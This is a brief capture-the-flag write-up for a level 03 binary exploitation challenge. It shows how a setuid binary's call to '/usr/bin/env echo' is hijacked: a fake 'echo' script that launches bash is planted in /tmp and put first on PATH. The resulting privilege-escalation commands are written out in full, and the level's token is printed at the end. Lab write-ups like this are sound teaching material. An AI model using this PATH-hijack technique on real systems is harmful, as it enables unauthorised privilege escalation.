| .. | ||
| flag | ||
| README.md | ||
The flag 03 is finally really binary exploitation.
First thing that I do is run a strings on the binary in order to see what comes out of it and towards where to search.
/lib/ld-linux.so.2
KT{K
__gmon_start__
libc.so.6
_IO_stdin_used
setresgid
setresuid
system
getegid
geteuid
__libc_start_main
GLIBC_2.0
PTRh
UWVS
[^_]
/usr/bin/env echo Exploit me
...
I see that /usr/bin/env echo is called (env is based on the environment of my current user).
I try to make a file in my home, but it is not permitted.
I therefore try in /tmp.
Which works and I therefore decide to open a shell.
cat /tmp/echo
bash
export PATH="/tmp:$PATH"
chmod 777 /tmp/echo
./level03
I therefore find myself directly on the shell of level03.
getflag
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus